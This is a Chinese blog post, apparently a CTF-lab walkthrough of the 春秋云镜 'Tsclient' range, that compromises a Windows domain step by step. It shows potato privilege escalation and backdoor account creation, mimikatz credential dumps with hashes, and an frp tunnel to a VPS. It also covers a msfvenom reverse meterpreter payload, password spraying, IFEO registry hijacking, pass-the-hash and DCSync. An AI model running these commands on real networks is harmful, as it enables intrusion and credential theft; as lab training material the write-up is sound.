<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Tsclient 难度：middle">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云镜Tsclient">
<meta property="og:url" content="https://qingfeng.tech/2023/10/22/Tsclient/index.html">
<meta property="og:site_name" content="清风的博客">
<meta property="og:description" content="Tsclient 难度：middle">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20230823081434-rjdwvd5.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20230823081419-au23h2i.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20230823083645-0khndbc.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20230823084104-apoi8b8.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021162903-9pyueq9.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021161735-iclmmei.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021163048-nhcmbrp.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021163119-uobga3l.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021163241-4kf8zof.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021211601-tx461b7.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021163847-e3djmvt.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021163825-jt2p8i5.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021164123-1jzpvai.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021164105-6gmmso7.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021165206-l4ni1h8.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021211935-ejhcsfc.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021213145-m37y3vh.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021190943-2aup7jo.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215545-nznv0tu.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215621-2o9yef0.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215707-vg5mor7.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021220617-ds2qjtj.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021213551-7wmwwkm.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021214720-9wfcf14.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021191911-8advxds.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021214528-1dk7xrg.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021214927-0tt5j6y.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215025-lr4naan.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215115-ly09kda.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215149-3yevwo8.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021215231-li4861l.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021211111-1z28wol.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20231021230102-0shmu2m.png">
<meta property="article:published_time" content="2023-10-22T14:17:53.000Z">
<meta property="article:modified_time" content="2023-11-24T03:12:34.486Z">
<meta property="article:author" content="清风">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qingfeng.tech/Blogimages/Tsclient/image-20230823081434-rjdwvd5.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>春秋云镜Tsclient</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><!-- hexo-inject:begin --><!-- hexo-inject:end --><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="max-width mx-auto px3 ltr">
    
      <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/11/21/Time/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/10/20/vulnhub9/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/10/22/Tsclient/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/10/22/Tsclient/&text=春秋云镜Tsclient"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/10/22/Tsclient/&is_video=false&description=春秋云镜Tsclient"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云镜Tsclient&body=Check out this article: https://qingfeng.tech/2023/10/22/Tsclient/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/10/22/Tsclient/&name=春秋云镜Tsclient&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/10/22/Tsclient/&t=春秋云镜Tsclient"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Tsclient"><span class="toc-number">1.</span> <span class="toc-text">Tsclient</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">1.1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">1.2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3"><span class="toc-number">1.3.</span> <span class="toc-text">flag3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DCSync%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.1.</span> <span class="toc-text">DCSync攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8C%95%E7%8C%B4%E6%A1%83"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">猕猴桃</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Impacket"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">Impacket</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#powershell"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">powershell</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        春秋云镜Tsclient
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">清风</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-10-22T14:17:53.000Z" class="dt-published" itemprop="datePublished">2023-10-22</time>
        
        (Updated: <time datetime="2023-11-24T03:12:34.486Z" class="dt-updated" itemprop="dateModified">2023-11-24</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E9%9D%B6%E6%9C%BA/">靶机</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Tsclient"><a href="#Tsclient" class="headerlink" title="Tsclient"></a>Tsclient</h1><p>过程遇到的问题：</p>
<pre class=" language-xml"><code class="language-xml">1.拿到html如何横向
2.内网代理，如何通过远程172的内网代理到我本地192的内网，拓扑：
            172.22.8.46												 192.168.120.128（Kali）
                ↓															↑
            172.22.8.18(39.99.224.53)----->123.249.8.26(CS)---------->192.168.120.1
3.远程内网172.22.8.46不出网，如何上线CS
</code></pre>
<p>Fscan扫描：</p>
<p>​<img src="/Blogimages/Tsclient/image-20230823081434-rjdwvd5.png" alt="image">​</p>
<p>扫到一个数据库密码，连接：</p>
<p>​<img src="/Blogimages/Tsclient/image-20230823081419-au23h2i.png" alt="image">​</p>
<p>甜土豆提权执行命令：</p>
<p>​<img src="/Blogimages/Tsclient/image-20230823083645-0khndbc.png" alt="image">​</p>
<h2 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h2><p>新建用户：</p>
<pre class=" language-bash"><code class="language-bash">C:/ProgramData/SweetPotato.exe -a <span class="token string">"net user qingfeng qwer1234! /add"</span>
C:/ProgramData/SweetPotato.exe -a <span class="token string">"net localgroup administrators qingfeng /add"</span>
C:/ProgramData/SweetPotato.exe -a <span class="token string">'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'</span>
</code></pre>
<p>登录远程桌面拿到第一个flag</p>
<p>这里由于远程桌面版本好像比较低，用rdesktop是无法连接成功的，所以使用apt install remmina下载remmina</p>
<p>使用remmina即可忽略版本问题</p>
<p>​<img src="/Blogimages/Tsclient/image-20230823084104-apoi8b8.png" alt="image">​</p>
<h2 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h2><p>上个猕猴桃看能不能抓到密码：</p>
<pre class=" language-bash"><code class="language-bash">log
privilege::debug
sekurlsa::logonpasswords
</code></pre>
<pre class=" language-xml"><code class="language-xml">
Authentication Id : 0 ; 661009 (00000000:000a1611)
Session           : RemoteInteractive from 2
User Name         : John
Domain            : WIN-WEB
Logon Server      : WIN-WEB
Logon Time        : 2023/8/23 8:12:39
SID               : S-1-5-21-4088072006-1921831747-1237773115-1008
    msv :
     [00000003] Primary
     * Username : John
     * Domain   : WIN-WEB
     * NTLM     : eec9381b043f098b011be51622282027
     * SHA1     : 18056c7dda082b2b219dbaac6157a1fb234403bc
    tspkg :
    wdigest :
     * Username : John
     * Domain   : WIN-WEB
     * Password : (null)
    kerberos :
     * Username : John
     * Domain   : WIN-WEB
     * Password : (null)
    ssp :
    credman :
</code></pre>
<p>抓到了John账号的NTLM</p>
<p>内网先fscan扫一下：</p>
<pre class=" language-xml"><code class="language-xml">C:\Windows\Temp>fscan.exe -h 172.22.8.18/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.7.1
start infoscan
[*] 已完成 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.18     is alive
(icmp) Target 172.22.8.46     is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:88 open
172.22.8.31:445 open
172.22.8.46:445 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.46:139 open
172.22.8.18:445 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.31:139 open
172.22.8.31:135 open
172.22.8.18:135 open
172.22.8.46:135 open
172.22.8.15:135 open
172.22.8.46:80 open
172.22.8.18:80 open
[*] alive ports len is: 16
[*] start vulscan
[+] NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:1cb7:3b8e:d89d:8985
[+] NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[+] NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[+] NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] 172.22.8.31          XIAORANG\WIN19-CLIENT
[*] 172.22.8.15    [+]DC XIAORANG\DC01
[*] 172.22.8.46          XIAORANG\WIN2016           Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa 1qaz!QAZ
[*] 已完成 16/16
[*] 扫描结束,耗时: 11.0592205s
</code></pre>
<p>现在发现三台域内主机：</p>
<pre class=" language-xml"><code class="language-xml">[*] 172.22.8.31          XIAORANG\WIN19-CLIENT
[*] 172.22.8.15    	[+]DC XIAORANG\DC01
[*] 172.22.8.46          XIAORANG\WIN2016
</code></pre>
<p>我们已经有控制权的是172.22.8.18</p>
<p>现在想要横向怎么办？</p>
<p>我们刚才创建的账号qingfeng肯定是和域内主机没有联系的</p>
<p>而且其他主机也没有什么可以打的web服务，只有一个默认的IIS，也扫不出来ms17-010</p>
<p>只能从john账号入手</p>
<p>先上线：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021162903-9pyueq9.png" alt="image">​</p>
<p>我们注入一个john进程：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021161735-iclmmei.png" alt="image">​</p>
<p>上线一个新的用户：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021163048-nhcmbrp.png" alt="image">​</p>
<p>使用<code>shell net use</code>​</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021163119-uobga3l.png" alt="image">​</p>
<p>发现他有一个连接</p>
<p>拿文件：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021163241-4kf8zof.png" alt="image">​</p>
<p>发现有一个密码账号（这里还有一个提示没看见。。。，原话是：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021211601-tx461b7.png" alt="image">​</p>
<p>而且是在域内的，我们挂个代理进去看看：</p>
<p>frpc配置文件如下：</p>
<pre class=" language-xml"><code class="language-xml">[common]
server_addr = vps_ip
server_port = 7000
token = xxxx


[proxy]
type = tcp
plugin = socks5
remote_port = 25599
</code></pre>
<p>frps配置文件如下：</p>
<pre class=" language-xml"><code class="language-xml">[common]
## 一、服务器的基本配置部分
## 7000 是FRP服务端口，可以改
bind_port = 7000
## dashboard_user和dashboard_pwd是FRP网页版管理员用户名密码，可以改。
dashboard_user = admin
dashboard_pwd = xxxx
## 7500 是网页版管理端口：可以通过 http://服务器ip:7500登陆
dashboard_port = 25500
## 服务器和客户机之间的心跳连接
heartbeat_timeout = 30
#token设置，需要和客户端一致，客户端与服务端通过token进行认证，建议满足复杂度要求
token=xxxx
</code></pre>
<p>修改Klai的proxychains配置文件</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021163847-e3djmvt.png" alt="image">​</p>
<p>访问确认代理可以使用</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021163825-jt2p8i5.png" alt="image">​  </p>
<p>关于代理更细的代理都写在<a href="http://qingfeng.tech/2023/06/06/%E5%86%85%E7%BD%91%E4%BB%A3%E7%90%86/">内网代理 | 清风的博客 (qingfeng.tech)</a></p>
<p>利用密码喷洒探测内网可以使用该密码登录的主机：</p>
<pre class=" language-shell"><code class="language-shell">proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
</code></pre>
<p>​<img src="/Blogimages/Tsclient/image-20231021164123-1jzpvai.png" alt="image">​</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021164105-6gmmso7.png" alt="image"></p>
<p>提示密码状态已过期</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021165206-l4ni1h8.png" alt="image">​</p>
<p>重置密码，31，15，46三台机子只有15可以重置成功</p>
<p>但是奇怪的是15无法登录，但是46却可以登录，而且也是修改完密码的。表示不解..</p>
<p>现在利用rdp登录：</p>
<pre class=" language-shell"><code class="language-shell">proxychains rdesktop 172.22.8.31 -u Aldrich -d xiaorang.lab -p 'qwer1234!'
proxychains rdesktop 172.22.8.15 -u Aldrich -d xiaorang.lab -p 'qwer1234!'
proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'qwer1234!' -r disk:Linuxictures=/home/kali/Desktop  
# 只有这个46可以登录成功  -r 是因为为了后续方便传输文件，挂载了一个虚拟磁盘名为Linuxictures，在RDP的资源管理器中可以看见
</code></pre>
<p>现在的46就是一个普通用户，想要flag必须提权到Administrator权限以上</p>
<p>这里就利用到了上面的提示</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021211935-ejhcsfc.png" alt="image">​</p>
<p>​<code>你知道映像劫持吗？</code>​</p>
<p>Image File Execution Options（IFEO）是映像劫持的英文，就是在执行某个程序时拦截并执行自己定义的程序。</p>
<p>配合后门持久化,可以实现系统在未登录状态下，通过快捷键运行自己的程序。（比如按5下shift出现的粘滞键Sethc.exe，还有Windows + U组合键时启动的utilman.exe程序）</p>
<p>更多如下</p>
<ul>
<li>屏幕键盘： C:\Windows\System32\osk.exe</li>
<li>放大镜： C:\Windows\System32\Magnify.exe</li>
<li>旁白： C:\Windows\System32\Narrator.exe</li>
<li>显示切换器 C:\Windows\System32\DisplaySwitch.exe</li>
</ul>
<p>打开Powershell输入命令可以看是否存在这个漏洞：</p>
<p>​<code>get-acl -path &quot;HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&quot; | fl *</code>​</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021213145-m37y3vh.png" alt="image">​</p>
<pre class=" language-xml"><code class="language-xml">1. NT AUTHORITY\Authenticated Users Allow SetValue,CreateSubKey,ReadKey: 这个规则允许"Authenticated Users"用户组执行 "SetValue" 和 "CreateSubKey" 操作，这两个操作都可以用来修改注册表的内容。
2. APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow SetValue,CreateSubKey,ReadKey: 这个规则允许"ALL APPLICATION PACKAGES"权限组执行 "SetValue" 和 "CreateSubKey" 操作，同样，这两个操作都可以用来修改注册表。

这意味着任何已认证的用户（"Authenticated Users"）和所有应用程序包权限组（"ALL APPLICATION PACKAGES"）的成员都可以对注册表进行修改，包括添加、修改和删除注册表键和值。
</code></pre>
<p>所以我们可以通过普通用户修改注册表：</p>
<pre class=" language-xml"><code class="language-xml">REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
</code></pre>
<p>修改成功后，锁定用户，右下角点击放大镜。弹出cmd表示成功劫持，读取flag即可</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021190943-2aup7jo.png" alt="image">​</p>
<p>‍</p>
<h2 id="flag3"><a href="#flag3" class="headerlink" title="flag3"></a>flag3</h2><p>接下来就是考虑如何拿到域控了</p>
<p>先上线我们上面提权到的机器（Administrator执行上线）</p>
<p>‍</p>
<p>这里上线的时候有个问题，这台机器是不出网的</p>
<p>想要上线CS，必须通过入口机作为跳板</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215545-nznv0tu.png" alt="image">​</p>
<p>入口机器选择这个Lintener作为中转机</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215621-2o9yef0.png" alt="image">​</p>
<p>这里就是建立了一个监听</p>
<p>再选择木马：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215707-vg5mor7.png" alt="image">​</p>
<p>这里是Stageless木马才能选中Lintener监听</p>
<p>之后执行即可上线</p>
<p>这里还有另一个问题，因为我vps上面没有MSF，如果想要上线我Kali的MSF应该怎么做（上线MSF为了提权，虽然没提上）</p>
<p>就是上面说到的问题：</p>
<p>​​<img src="/Blogimages/Tsclient/image-20231021220617-ds2qjtj.png" alt="image">​​</p>
<p>毫无疑问我们是利用线路1</p>
<p>首先需要以39.99.224.53作为FRPS</p>
<p>frps.ini如下：</p>
<pre class=" language-xml"><code class="language-xml">[common]
bind_port = 7001
token=frpToken@admin2022
</code></pre>
<p>kali作为frpc</p>
<p>frpc.ini如下:</p>
<pre class=" language-xml"><code class="language-xml">[common]
server_addr = 39.99.224.53
server_port = 7001
token = frpToken@admin2022

[proxy]
type = tcp
local_ip = 192.168.120.128
local_port = 9999
remote_port = 9999
</code></pre>
<p>接下来的问题就是生成木马了</p>
<pre class=" language-shell"><code class="language-shell">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.22.8.18  LPORT=9999 -f exe > muma.exe
</code></pre>
<p>这里为什么选择LHOST&#x3D;172.22.8.18呢？</p>
<p>因为我们使用frp已经把172.22.8.18（39.99.224.53）的9999端口转发到kali的9999端口了，并且172.22.8.46只能访问到172.22.8.18（39.99.224.53）的9999端口</p>
<p>所以就相当于我们msf的9999端口就在172.22.8.18（39.99.224.53）的9999端口</p>
<p>但是上线MSF仍然没有可以利用的提权…</p>
<p>回到flag3</p>
<p>这台主机已经是在域内了，所以我们可以直接看域内的管理员用户</p>
<p>​<code>shell net group &quot;domain admins&quot; /domain</code>​</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021213551-7wmwwkm.png" alt="image">​</p>
<p>可以看到这里有两个用户：</p>
<pre class=" language-xml"><code class="language-xml">Administrator
Win2016$(机器用户)
</code></pre>
<p>Administrator是DC上的账户，我们没有权限直接抓到他</p>
<p>‍</p>
<p>但是我们可以抓到WIN2016的NTLM：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021214720-9wfcf14.png" alt="image">​</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021191911-8advxds.png" alt="image">​</p>
<p>利用这个NTLM：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021214528-1dk7xrg.png" alt="image">​</p>
<p>首先提到<code>WIN2016</code>​的权限</p>
<p>然后抓取Administrator的NTLM值：</p>
<p>​<code>mimikatz lsadump::dcsync /domain:xiaorang.lab /all /csv exit</code>​</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021214927-0tt5j6y.png" alt="image">​</p>
<p>再次利用Administrator的NTLM建立连接</p>
<p>先切换任务视图</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215025-lr4naan.png" alt="image"></p>
<p>再选择64位的pkexec横向：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215115-ly09kda.png" alt="image">​</p>
<p>选择好使用的hash值</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215149-3yevwo8.png" alt="image">​</p>
<p>再确定好Listener和Session，成功后会返回一个标识</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021215231-li4861l.png" alt="image">​</p>
<p>再利用<code>dcsync</code>​抓到<code>Administrator</code>​的账号</p>
<p>读取flag</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021211111-1z28wol.png" alt="image"></p>
<p>关于这里的<code>dcsync</code>​也有必要说一下</p>
<blockquote>
<h3 id="DCSync攻击"><a href="#DCSync攻击" class="headerlink" title="DCSync攻击"></a>DCSync攻击</h3><p><strong>一个域环境内可以拥有多台域控制器，每个域控制器各自存储着一份所在域的活动目录的可写副本，对目录的任何修改都可以从源控制器同步到本域、域树和域林中的其他域控制器上，当一个域控想从另一个域控获取域数据更新时，客户端域控会向服务端域控发送DSGetNCChanges请求，该请求的响应将包含客户段域控必须应用到其活动目录副本的一组更新。通常情况下，域控制器之间每15分组就会有一次域数据同步。</strong></p>
<p><strong>DCSync技术就是利用域控制器同步的原理，通过Directory Replication Service(DRS)服务的IDL_DRSGetNCChanges接口向域控发起数据通过请求。在DCSync出现前，要获得所有域用户的哈希，测试人员可能需要登录域控制器或通过卷影拷贝技术获取NTDS.dit文件。利用DCSync，测试人员可以在域内任何一台机器上模拟一个域控制器，通过域数据同步复制的方式获取正在运行的合法域控制器上的数据。注意，DCSync攻击不适用于只读域控制器（RODC）。</strong></p>
<p><strong>在默认情况下，只有Administrator，Domain Controllers和Enterprise Domain Admins组内的用户和域控制器的机器账户才有执行DCSync操作的权限。</strong></p>
<p>‍</p>
<p><strong>一般来说，域管理员权限的用户以及Krbtgt用户的哈希是有价值的。通过域管理员的哈希可以直接获取服务器控制权，而Krbtgt用户的哈希可以用来制作黄金票据，实现票据传递攻击。拿到域控权限导出全部hash，就可以直接PTH攻击域内所有机器了。</strong></p>
<pre><code>                                                            --  xiaoqiuxx
</code></pre>
</blockquote>
<p>实现途径：</p>
<h4 id="猕猴桃"><a href="#猕猴桃" class="headerlink" title="猕猴桃"></a>猕猴桃</h4><pre class=" language-xml"><code class="language-xml"># 导出域内指定用户的信息(包括哈希值)
mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /user:administrator" exit
mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /user:administrator /csv" exit

# 导出域内所有用户的信息(包括哈希值)
mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /all" exit
mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /all /csv" exit
</code></pre>
<h4 id="Impacket"><a href="#Impacket" class="headerlink" title="Impacket"></a>Impacket</h4><pre class=" language-xml"><code class="language-xml">#导出域管理员Administrator用户的哈希值
python3 secretsdump.py whoamianony/administrator:Whoami2021@192.168.93.30 -dc-ip 192.168.93.30 -just-dc-user administrator    # 获取 administrator 用户的哈希
